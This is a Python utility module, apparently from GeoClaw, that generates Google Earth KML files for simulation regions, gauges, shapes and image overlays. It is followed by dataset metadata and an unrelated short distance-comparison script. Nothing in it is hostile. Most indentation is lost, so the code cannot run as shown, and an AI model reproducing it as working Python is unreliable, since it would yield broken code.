kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
regions = rundata.regiondata.regions
if len(regions)==0 and verbose:
print("No regions found in setrun.py")
for rnum,region in enumerate(regions):
if not combined:
fname = 'Region_%s.kml' % str(rnum).zfill(2)
kml_text = kml_header(fname)
minlevel,maxlevel = region[0:2]
t1,t2 = region[2:4]
x1,x2,y1,y2 = region[4:]
if verbose:
print("Region %i: %10.6f %10.6f %10.6f %10.6f" \
% (rnum,x1,x2,y1,y2))
print(" minlevel = %i, maxlevel = %i" \
% (minlevel,maxlevel) \
+ " t1 = %s, t2 = %s" % (f2s(t1),f2s(t2)))
mapping = {}
mapping['minlevel'] = minlevel
mapping['maxlevel'] = maxlevel
mapping['t1'] = t1
mapping['t2'] = t2
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = 'Region %i' % rnum
description = "minlevel = %i, maxlevel = %i\n" % (minlevel,maxlevel) \
+ " t1 = %s, t2 = %s\n" % (f2s(t1),f2s(t2)) \
+ " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s\n\n" % (f2s(y1),f2s(y2))
if len(dy_levels) >= minlevel:
dy = dy_levels[minlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "Level %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (minlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
if (maxlevel > minlevel) and (len(dy_levels) >= maxlevel):
dy = dy_levels[maxlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "\nLevel %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (maxlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
mapping['desc'] = description
mapping['color'] = "FFFFFF" # white
mapping['width'] = 3
region_text = kml_region(mapping)
kml_text = kml_text + region_text
if not combined:
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
flagregions = rundata.flagregiondata.flagregions
if len(flagregions)==0 and verbose:
print("No flagregions found in setrun.py")
for rnum,flagregion in enumerate(flagregions):
name = flagregion.name
        if not combined:
            if name == '':
fname = 'FlagRegion_%s.kml' % str(rnum).zfill(2)
else:
fname = name + '.kml'
kml_text = kml_header(fname)
#if flagregion.spatial_region is None:
# flagregion.read_spatial_region()
if flagregion.spatial_region_type == 1:
x1,x2,y1,y2 = flagregion.spatial_region
else:
flagregion.read_spatial_region()
x1,x2,y1,y2 = flagregion.spatial_region.bounding_box()
minlevel = flagregion.minlevel
maxlevel = flagregion.maxlevel
if verbose:
print("Region ", flagregion.name)
mapping = {}
mapping['minlevel'] = flagregion.minlevel
mapping['maxlevel'] = flagregion.maxlevel
mapping['t1'] = flagregion.t1
mapping['t2'] = flagregion.t2
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = flagregion.name
description = "minlevel = %i, maxlevel = %i\n" \
% (flagregion.minlevel,flagregion.maxlevel) \
+ " t1 = %s, t2 = %s\n" % (f2s(flagregion.t1),f2s(flagregion.t2)) \
+ " Bounding box: \n" \
+ " x1_bb = %s, x2_bb = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1_bb = %s, y2_bb = %s\n\n" % (f2s(y1),f2s(y2))
if len(dy_levels) >= minlevel:
dy = dy_levels[minlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "Level %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (minlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
if (maxlevel > minlevel) and (len(dy_levels) >= maxlevel):
dy = dy_levels[maxlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "\nLevel %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (maxlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
mapping['desc'] = description
mapping['color'] = "00FFFF" # yellow
mapping['width'] = 2
if flagregion.spatial_region_type == 1:
x1,x2,y1,y2 = flagregion.spatial_region
x = [x1,x1,x2,x2,x1]
y = [y1,y2,y2,y1,y1]
else:
x,y = flagregion.spatial_region.vertices()
v = "\n"
for j in range(len(x)):
v = v + "%s,%s,%s\n" % (f2s(x[j]),f2s(y[j]),f2s(elev))
v = v + "%s,%s,%s\n" % (f2s(x[0]),f2s(y[0]),f2s(elev))
        v = v.replace(' ','')
        region_text = kml_region(mapping, v)
kml_text = kml_text + region_text
if not combined:
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
if combined:
fname = fname_combined
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def line2kml(xy,fname='line.kml',name='line',color='00FFFF',width=3,
verbose=True):
"""
Make a KML line with default color yellow.
:Inputs:
- *xy* a tuple ((x1,x2),(y1,y2)) (preferred)
or (x1,x2,y1,y2) (for backward compatibility)
- *fname* (str) name of resulting kml file
- *name* (str) name to appear on line on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
"""
if type(xy[0]) is tuple:
x1,x2 = xy[0]
y1,y2 = xy[1]
else:
x1,x2,y1,y2 = xy[0:]
if verbose:
print("Line: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = name
mapping['desc'] = " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s" % (f2s(y1),f2s(y2))
mapping['color'] = color
mapping['width'] = width
region_text = kml_line(mapping)
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def box2kml(xy,fname=None,name='box',color='FF0000',width=3,verbose=True):
"""
Make a KML box with default color blue.
:Inputs:
- *xy* a tuple ((x1,x2),(y1,y2)) (preferred)
or (x1,x2,y1,y2) (for backward compatibility)
- *fname* (str) name of resulting kml file
- *name* (str) name to appear in box on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
"""
if fname is None:
fname = name + '.kml'
if type(xy[0]) is tuple:
x1,x2 = xy[0]
y1,y2 = xy[1]
else:
x1,x2,y1,y2 = xy[0:]
if verbose:
print("Box: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = name
mapping['desc'] = " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s" % (f2s(y1),f2s(y2))
mapping['color'] = color
mapping['width'] = width
region_text = kml_region(mapping)
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def quad2kml(xy,fname=None,name='quad',color='FF0000',width=3,verbose=True):
"""
Make a KML quadrilateral with default color blue.
:Inputs:
- *xy* a tuple ((x1,x2,x3,x4),(y1,y2,y3,y4)) (preferred)
        or (x1,y1,x2,y2,x3,y3,x4,y4) (for backward compatibility)
- *fname* (str) name of resulting kml file
- *name* (str) name to appear in box on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
"""
if fname is None:
fname = name + '.kml'
if type(xy[0]) is tuple:
x1,x2,x3,x4 = xy[0]
y1,y2,y3,y4 = xy[1]
else:
x1,y1,x2,y2,x3,y3,x4,y4 = xy[0:]
if verbose:
print("Quadrilateral: %10.6f %10.6f" % (x1,y1))
print(" %10.6f %10.6f" % (x2,y2))
print(" %10.6f %10.6f" % (x3,y3))
print(" %10.6f %10.6f" % (x4,y4))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['x3'] = x3
mapping['x4'] = x4
mapping['y1'] = y1
mapping['y2'] = y2
mapping['y3'] = y3
mapping['y4'] = y4
mapping['elev'] = elev
mapping['name'] = name
mapping['desc'] = " x1 = %s, y1 = %s\n" % (f2s(x1),f2s(y1)) \
+ " x2 = %s, y2 = %s" % (f2s(x2),f2s(y2)) \
+ " x3 = %s, y3 = %s" % (f2s(x3),f2s(y3)) \
+ " x4 = %s, y4 = %s" % (f2s(x4),f2s(y4))
mapping['color'] = color
    mapping['width'] = width
region_text = kml_region(mapping)
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def poly2kml(xy,fname=None,name='poly',color='00FF00', width=3,
verbose=True, max_vertices_in_description=20):
"""
    Make a KML polygon with default color green.
:Inputs:
- *xy* a tuple (x,y) where x and y are lists of vertices
- *fname* (str) name of resulting kml file
- *name* (str) name to appear in box on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
- *max_vertices_in_description* (int) - if more than this number
of vertices, only list number in description box, not all vertices
"""
if fname is None:
fname = name + '.kml'
x,y = xy
if verbose:
print("Creating kml for polygon with %i vertices" % len(x))
if (len(x) <= max_vertices_in_description):
for j in range(len(x)):
print(" %10.6f %10.6f" % (x[j],y[j]))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x'] = x
mapping['y'] = y
mapping['elev'] = elev
mapping['name'] = name
d = " Polygon with %i vertices" % len(x)
if (len(x) <= max_vertices_in_description):
d = " x[0] = %s, y[0] = %s\n" % (f2s(x[0]),f2s(y[0]))
for j in range(1,len(x)):
d = d + " x[%i] = %s, y[%i] = %s\n" % (j,f2s(x[j]),j,f2s(y[j]))
mapping['desc'] = d
mapping['color'] = color
mapping['width'] = width
v = "\n"
for j in range(len(x)):
v = v + "%s,%s,%s\n" % (f2s(x[j]),f2s(y[j]),f2s(elev))
v = v + "%s,%s,%s\n" % (f2s(x[0]),f2s(y[0]),f2s(elev))
    v = v.replace(' ','')
    region_text = kml_region(mapping, v)
    kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def gauges2kml(rundata=None, fname='gauges.kml', verbose=True):
"""
Create a KML marker for each gauge specified for a GeoClaw run.
:Inputs:
- *rundata* - an object of class *ClawRunData* or None
If *rundata==None*, try to create based on executing function *setrun*
from the `setrun.py` file in the current directory.
- *fname* (str) - resulting kml file.
- *verbose* (bool) - If *True*, print out info about each region found
:Example:
>>> from clawpack.geoclaw import kmltools
>>> kmltools.gauges2kml()
is equivalent to:
>>> from clawpack.geoclaw import kmltools
>>> from setrun import setrun
>>> rundata = setrun()
>>> kmltools.gauges2kml(rundata)
By default this creates a file named *gauges.kml* that can be opened in
Google Earth.
"""
from importlib import reload
if rundata is None:
try:
import setrun
reload(setrun)
rundata = setrun.setrun()
except:
raise IOError("*** cannot execute setrun file")
elev = 0.
kml_text = kml_header(fname)
gauges = rundata.gaugedata.gauges
if len(gauges)==0 and verbose:
print("No gauges found in setrun.py")
for rnum,gauge in enumerate(gauges):
t1,t2 = gauge[3:5]
x1,y1 = gauge[1:3]
gaugeno = gauge[0]
if verbose:
print("Gauge %i: %s, %s \n" % (gaugeno,f2s(x1),f2s(y1)) \
+ " t1 = %s, t2 = %s" % (f2s(t1),f2s(t2)))
mapping = {}
mapping['gaugeno'] = gaugeno
mapping['t1'] = t1
mapping['t2'] = t2
mapping['x1'] = x1
mapping['y1'] = y1
mapping['elev'] = elev
        mapping['name'] = 'Gauge %i' % gaugeno
description = " t1 = %s, t2 = %s\n" % (f2s(t1),f2s(t2)) \
+ " x1 = %s, y1 = %s\n" % (f2s(x1),f2s(y1))
mapping['desc'] = description
gauge_text = kml_gauge(mapping)
kml_text = kml_text + gauge_text
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def kml_header(name='GeoClaw kml file'):
header = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2"
xmlns:gx="http://www.google.com/kml/ext/2.2">
<Document><name>%s</name>
""" % name
return header
def kml_footer():
footer = """
</Document>
</kml>
"""
return footer
def kml_region(mapping, vertex_text=None):
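    """
    Return KML Style/Placemark text for a polygon described by `mapping`.

    A minimal illustrative mapping for the two-corner rectangle form
    (all values below are arbitrary):

    >>> mapping = {'x1': -120., 'x2': -119., 'y1': 34., 'y2': 35.,
    ...            'elev': 0., 'name': 'box', 'desc': 'a box',
    ...            'color': '0000FF', 'width': 2}
    >>> text = kml_region(mapping)
    """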
if vertex_text is None:
if 'x3' in mapping:
# quadrilateral with 4 corners specified
vertex_text = """
{x1:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y2:.9f},{elev:.9f}
{x3:.9f},{y3:.9f},{elev:.9f}
{x4:.9f},{y4:.9f},{elev:.9f}
{x1:.9f},{y1:.9f},{elev:.9f}
""".format(**mapping).replace(' ','')
else:
# rectangle with 2 corners specified
vertex_text = """
{x1:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y2:.9f},{elev:.9f}
{x1:.9f},{y2:.9f},{elev:.9f}
{x1:.9f},{y1:.9f},{elev:.9f}
""".format(**mapping).replace(' ','')
mapping['vertices'] = vertex_text
if len(mapping['color'])==6:
mapping['color'] = 'FF' + mapping['color']
kml_text = """
<Style id="Path">
<LineStyle><color>{color:s}</color><width>{width:d}</width></LineStyle>
<PolyStyle><color>00000000</color></PolyStyle>
</Style>
<Placemark><name>{name:s}</name>
<description>{desc:s}</description>
<styleUrl>#Path</styleUrl>
<Polygon>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs><LinearRing><coordinates>
{vertices:s}
</coordinates></LinearRing></outerBoundaryIs>
</Polygon>
</Placemark>
""".format(**mapping)
return kml_text
def kml_line(mapping):
if len(mapping['color'])==6:
mapping['color'] = 'FF' + mapping['color']
line_text = """
{x1:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y2:.9f},{elev:.9f}
""".format(**mapping).replace(' ','')
mapping['line'] = line_text
kml_text = """
<Style id="Path">
<LineStyle><color>{color:s}</color><width>{width:d}</width></LineStyle>
<PolyStyle><color>00000000</color></PolyStyle>
</Style>
<Placemark><name>{name:s}</name>
<description>{desc:s}</description>
<styleUrl>#Path</styleUrl>
<LineString>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<coordinates>
{line:s}
</coordinates>
</LineString>
</Placemark>
""".format(**mapping)
return kml_text
def kml_gauge(mapping):
gauge_text = "{x1:.9f},{y1:.9f},{elev:.9f}".format(**mapping).replace(' ','')
mapping['gauge'] = gauge_text
kml_text = """
<Placemark><name>Gauge {gaugeno:d}</name>
<description>{desc:s}</description>
<styleUrl>#markerstyle</styleUrl>
<Point>
<coordinates>
{gauge:s}
</coordinates>
</Point>
</Placemark>
""".format(**mapping)
return kml_text
def kml_timespan(t1,t2,event_time=None,tz=None,tscale=1):
r"""
Create time strings necessary for sliders in Google Earth. The time
span will cover time [t1,t2], with the start of the event given by
event_time.
[t1,t2] : time span,
event_time : Start of event in UTC : [Y,M,D,H,M,S], e.g. [2010,2,27,3,34,0]
tz : time zone offset to UTC. e.g. +3 for Chile; -9 for Japan.
Time span element looks like ::
<TimeSpan>
<begin>2010-02-27T06:34:00+03:00</begin>
<end>2010-02-27T07:04:00+03:00</end>
</TimeSpan>
As for how well this handles Daylight Savings time, here is what the documentation
on the Python 'time' module has to say :
"DST is Daylight Saving Time, an adjustment of the timezone by (usually) one hour
during part of the year. DST rules are magic (determined by local law) and can
change from year to year. The C library has a table containing the local rules
(often it is read from a system file for flexibility) and is the only source of
True Wisdom in this respect."
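    :Example: (illustrative values, using the Chile 2010 event time from above)

    >>> begin, end = kml_timespan(0., 3600.,
    ...                           event_time=[2010,2,27,3,34,0], tz=3)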
"""
t1 = t1*tscale # Time converted to seconds
t2 = t2*tscale
import time
# to adjust time from UTC to time in event locale.
    if event_time is None:
# Use local time.
starttime = time.mktime(time.localtime()) # seconds UTC
        tz_offset = time.timezone/3600.0   # in hours
else:
ev = tuple(event_time) + (0,0,0) # Extend to 9 tuple; no DST
# mktime returns time in seconds + timezone offset, i.e. seconds UTC
# Subtract out the timezone offset here, since it will get added back
# in when we do gmtime(starttime + ...) below.
starttime = time.mktime(ev) - time.timezone
if tz is None:
print("===> Time zone offset not defined; assuming zero offset. " \
"Set plotdata.kml_tz_offset to define an offset (in hours) from "\
"UTC (positive west of UTC; negative east of UTC)")
tz = 0
tz_offset = tz
    if tz_offset is None:
tzstr = "Z" # no offset; could also just set to "+00:00"
else:
# Google Earth will show time slider time in local time, where
# local + offset = UTC.
tz_offset = tz_offset*3600. # Offset in seconds
tz = time.gmtime(abs(tz_offset))
if (tz_offset > 0):
tzstr = time.strftime("+%H:%M",tz) # Time to UTC
else:
tzstr = time.strftime("-%H:%M",tz)
# Get time strings for start and end of time span
gbegin = time.gmtime(starttime + t1)
timestrbegin = "%s%s" % (time.strftime("%Y-%m-%dT%H:%M:%S", gbegin),tzstr)
gend = time.gmtime(starttime + t2)
timestrend = "%s%s" % (time.strftime("%Y-%m-%dT%H:%M:%S", gend),tzstr)
return timestrbegin,timestrend
def topo2kml(topo_file_name, topo_type, color='00FF00'):
"""
Create a kml file putting a box around the region covered by a topofile.
Color is green by default.
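    :Example: (illustrative file name; topo_type=3 is one of the GeoClaw
     topo formats)

    >>> topo2kml('etopo_sample.tt3', topo_type=3)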
"""
import os
from clawpack.geoclaw import topotools
topo = topotools.Topography(topo_file_name, topo_type=topo_type)
topo.read_header()
xy = topo.extent
name = os.path.splitext(os.path.split(topo_file_name)[-1])[0]
file_name = '%s.kml' % name
box2kml(xy, file_name, name, color)
def dtopo2kml(dtopo_file_name, dtopo_type, color='8888FF'):
"""
Create a kml file putting a box around the region covered by a dtopofile.
Color is pink by default.
"""
import os
from clawpack.geoclaw import dtopotools
dtopo = dtopotools.DTopography()
dtopo.read(dtopo_file_name, dtopo_type)
x1 = dtopo.x.min()
x2 = dtopo.x.max()
y1 = dtopo.y.min()
y2 = dtopo.y.max()
xy = (x1,x2,y1,y2)
name = os.path.splitext(os.path.split(dtopo_file_name)[-1])[0]
file_name = '%s.kml' % name
box2kml(xy, file_name, name, color)
def make_input_data_kmls(rundata, combined=False):
"""
Produce kml files for the computational domain, all gauges and regions
specified, and all topo and dtopo files specified in rundata.
This can be used, e.g. by adding the lines
from clawpack.geoclaw import kmltools
kmltools.make_input_data_kmls(rundata)
to the end of a `setrun.py` file so that `make data` will generate all
kml files in addition to the `*.data` files.
"""
import os
from clawpack.geoclaw import topotools, dtopotools
regions2kml(rundata, combined=combined)
gauges2kml(rundata)
topofiles = rundata.topo_data.topofiles
for f in topofiles:
topo_file_name = f[-1]
topo_type = f[0]
topo2kml(topo_file_name, topo_type)
dtopofiles = rundata.dtopo_data.dtopofiles
for f in dtopofiles:
dtopo_file_name = f[-1]
dtopo_type = f[0]
dtopo2kml(dtopo_file_name, dtopo_type)
def pcolorcells_for_kml(X, Y, Z, png_filename=None, dpc=2, max_inches=15.,
verbose=True, **kwargs):
"""
Wraps pcolormesh in a way that a png file is created that can be viewed
on Google Earth with proper alignment and with sharp grid cell edges.
Works if X,Y are cell centers or edges, and X,Y can be 2d or 1d arrays.
X,Y,Z is the data to be plotted. It is assumed to be finite volume data
where Z[i,j] is a constant value over a grid cell.
Internally x,y are defined as 1d arrays since it is assumed the
grids are Cartesian.
If the length of the 1d arrays x and y match the dimensions of Z then
these are assumed to be cell center values. In this case the arrays
are expanded by one to obtain x_edge, y_edge as edge values,
as needed for proper alignment.
If the length of x,y is already one greater than the corresponding
dimension of Z, then it is assumed that these are already edge values.
If png_filename is not None then a png file is written with appropriate dpi.
    dpc is the desired "dots per cell", how many pixels to allot to each
    grid cell. This should be an integer to avoid interpolation
between cells that smears out the cell boundaries in the png file.
Increasing this will give sharper boundaries but also larger files that
load more slowly.
max_inches is the desired size of the longer edge of the figure created.
This value is not very important unless you want to view the png file
on a screen outside of Google Earth. Internally the dimensions of the
figure `x_inches` and `y_inches` are determined to be consistent
with the value `dpc` specified and a reasonable value of `dpi` for the
png file, as described below.
Internally the value `dpi` (dots per inch) for the png file is
determined so that it is at least 16 and so that:
        dpi * x_inches = dpc * x_cells
        dpi * y_inches = dpc * y_cells
where `x_cells`, `y_cells` are the number of cells in each direction.
`kwargs` are passed to `pcolormesh`, e.g. `cmap` and `norm` are
generally specified.
This function returns `fig, ax, png_extent, kml_dpi` so the user can further
    annotate the figure before saving it as a png file, which should then
be done with:
plt.savefig(png_filename, transparent=True, dpi=kml_dpi)
    The `png_extent` is needed in constructing a kml file to display the
png file on Google Earth, e.g. using the function `png2kml` in this
module.
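    :Example: (a sketch with arbitrary data; `Z.png` is a made-up file name)

    >>> import numpy as np
    >>> x = np.linspace(0., 1., 11)    # 10 cells in x (edge values)
    >>> y = np.linspace(0., 2., 21)    # 20 cells in y (edge values)
    >>> Z = np.random.rand(20, 10)     # one value per grid cell
    >>> fig, ax, png_extent, kml_dpi = pcolorcells_for_kml(x, y, Z,
    ...     png_filename='Z.png')
    >>> png2kml(png_extent, ['Z.png'], name='Z_overlay')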
"""
from matplotlib import pyplot as plt
import numpy as np
# If X is 2d extract proper 1d slice:
if X.ndim == 1:
x = X
elif X.ndim == 2:
if X[0,0] == X[0,1]:
x = X[:,0]
else:
x = X[0,:]
# If Y is 2d extract proper 1d slice:
if Y.ndim == 1:
y = Y
elif Y.ndim == 2:
if Y[0,0] == Y[0,1]:
y = Y[:,0]
else:
y = Y[0,:]
dx = x[1]-x[0]
dy = y[1]-y[0]
if len(x) == Z.shape[1]:
# cell centers, so xedge should be expanded by dx/2 on each end:
xedge = np.arange(x[0]-0.5*dx, x[-1]+dx, dx)
elif len(x) == Z.shape[1]+1:
# assume x already contains edge values
xedge = x
else:
raise ValueError('x has unexpected length')
if len(y) == Z.shape[0]:
        # cell centers, so yedge should be expanded by dy/2 on each end:
yedge = np.arange(y[0]-0.5*dy, y[-1]+dy, dy)
elif len(y) == Z.shape[0]+1:
        # assume y already contains edge values
yedge = y
else:
raise ValueError('y has unexpected length')
x1 = xedge[0]; x2 = xedge[-1]
y1 = yedge[0]; y2 = yedge[-1]
# Number of grid cells:
x_cells = int(round((x2-x1)/dx))
y_cells = int(round((y2-y1)/dy))
max_cells = max(x_cells, y_cells)
dots_per_cell = dpc
max_dots = dots_per_cell * max_cells
# determine dots per inch for png file, minimum 16:
kml_dpi = max(int(round(max_dots / max_inches)), 16)
dots_x = x_cells * dots_per_cell
dots_y = y_cells * dots_per_cell
# determine dimensions for figsize:
x_inches = dots_x / kml_dpi
y_inches = dots_y / kml_dpi
dpc_x = kml_dpi * x_inches / x_cells
dpc_y = kml_dpi * y_inches / y_cells
if verbose:
        print('Using kml_dpi = %i, figure size %.6f by %.6f inches' \
% (kml_dpi,x_inches,y_inches))
print('Figure has %i by %i grid cells of uniform color' \
% (x_cells, y_cells))
print('Dots per cell in x: %.6f, in y: %.6f' % (dpc_x,dpc_y))
print(' These should be integers')
# Create figure of appropriate size and pcolormesh plot
# with no margins, ticks, or labels:
fig = plt.figure(figsize=(x_inches,y_inches))
ax = plt.axes()
plt.axis('off')
pc = plt.pcolormesh(xedge, yedge, Z, **kwargs)
ax.set_xticks([])
ax.set_yticks([])
ax.set_frame_on(False)
fig.set_size_inches(x_inches,y_inches)
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
if png_filename is not None:
plt.savefig(png_filename, transparent=True, dpi=kml_dpi)
if verbose:
print('Created ',png_filename)
png_extent = [xedge[0], xedge[-1], yedge[0], yedge[-1]]
return fig, ax, png_extent, kml_dpi
def kml_png(mapping):
"""
Create text for a png file overlay
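
    Expected keys in `mapping` are name, png_file, and the extent
    corners x1, x2, y1, y2.  An illustrative mapping (values arbitrary):

    >>> mapping = {'name': 'frame1', 'png_file': 'frame1.png',
    ...            'x1': -120., 'x2': -119., 'y1': 34., 'y2': 35.}
    >>> text = kml_png(mapping)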
"""
kml_text = """
<GroundOverlay>
<name>{name:s}</name>
<visibility>1</visibility>
<gx:altitudeMode> clampToSeaFloor </gx:altitudeMode>
<Icon>
<href>{png_file:s}</href>
</Icon>
<LatLonBox>
<north>{y2:.9f}</north>
<south>{y1:.9f}</south>
<east>{x2:.9f}</east>
<west>{x1:.9f}</west>
</LatLonBox>
</GroundOverlay>
""".format(**mapping)
return kml_text
def kml_cb(mapping):
"""
Create text for a colorbar png file overlay
"""
kml_text = """
<ScreenOverlay>
<name>{name:s}</name>
<Icon>
<href>{cb_file:s}</href>
</Icon>
<overlayXY x="{xfrac:.4f}" xunits="fraction" y="{yfrac:.4f}" yunits="fraction"/>
<screenXY x="{xfrac:.4f}" xunits="fraction" y="{yfrac:.4f}" yunits="fraction"/>
</ScreenOverlay>
""".format(**mapping)
return kml_text
radio_style_text = """
<Style id="folderStyle">
<ListStyle>
<listItemType>radioFolder</listItemType>
</ListStyle>
</Style>
<styleUrl>#folderStyle</styleUrl>
"""
def png2kml(extent, png_files, png_names=None, name='png_files', fname=None,
radio_style=False, cb_files=None, cb_names=None,
cb_xfracs=None, cb_yfracs=None, verbose=True):
"""
Create a kml file `fname` linking overlays for each png file in `png_files`.
`extent` is [x1,x2,y1,y2] specifying where image should be overlaid.
`png_names`, if present, will give the name for each image for the
Google Earth menu.
If `radio_style` is True, set radio buttons so only one can be shown at a
time, useful for combining plots of different quantities in same file.
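
    :Example: (illustrative file names)

    >>> png2kml([-120., -119., 34., 35.], ['frame1.png', 'frame2.png'],
    ...         png_names=['Frame 1', 'Frame 2'], name='frames')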
"""
import os
if fname is None:
fname = name + '.kml'
x1,x2,y1,y2 = extent
if verbose:
print("Extent: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
kml_text = kml_header(fname) + \
"<name>%s</name>\n" % name + "<open>1</open>\n"
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
for k,png_file in enumerate(png_files):
mapping['png_file'] = png_file
try:
mapping['name'] = png_names[k]
except:
mapping['name'] = 'No name'
kml_text = kml_text + kml_png(mapping)
if radio_style:
kml_text = kml_text + radio_style_text
if cb_files:
# colorbars
for k,cb_file in enumerate(cb_files):
mapping['cb_file'] = cb_file
try:
mapping['name'] = cb_names[k]
except:
mapping['name'] = 'Colorbar'
try:
mapping['xfrac'] = cb_xfracs[k]
except:
mapping['xfrac'] = 0.025 + k*0.075
try:
mapping['yfrac'] = cb_yfracs[k]
except:
mapping['yfrac'] = 0.05
kml_text = kml_text + kml_cb(mapping)
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def kml_build_colorbar(cb_filename, cmap, cmin=None, cmax=None,
norm=None, label=None, title=None, extend='neither'):
"""
Make a png file with a colorbar corresponding to cmap, norm.
    cmin, cmax are used only if norm is not provided.
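
    :Example: (illustrative; the file name, range, and label are arbitrary)

    >>> from matplotlib import cm
    >>> kml_build_colorbar('colorbar.png', cm.viridis,
    ...                    cmin=0., cmax=5., label='depth (m)')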
"""
import matplotlib.pyplot as plt
import matplotlib as mpl
fig = plt.figure(figsize=(1.2,3))
ax1 = fig.add_axes([0.3, 0.075, 0.20, 0.80])
tick = ax1.yaxis.get_major_ticks()
plt.tick_params(axis='y', which='major', labelsize=8)
if norm is None:
norm = mpl.colors.Normalize(vmin=cmin,vmax=cmax)
cb1 = mpl.colorbar.ColorbarBase(ax1,cmap=cmap,
norm=norm,
extend=extend,
orientation='vertical')
if label:
cb1.set_label(label)
if title:
ax1.set_title(title)
# This is called from plotpages, in <plotdir>.
    plt.savefig(cb_filename, transparent=True)
| [
"[email protected]"
] | |
848e22f57c458f6d6b6d62ebfd4d38411ec32a4d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03623/s878257952.py | 3b621e177a4b3597998ce1dffd6331ec72409b90 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | import numpy as np
x, a, b = map(int, input().split())
ans = 'A' if np.abs(a-x) < np.abs(b-x) else 'B'
print(ans) | [
"[email protected]"
] | |
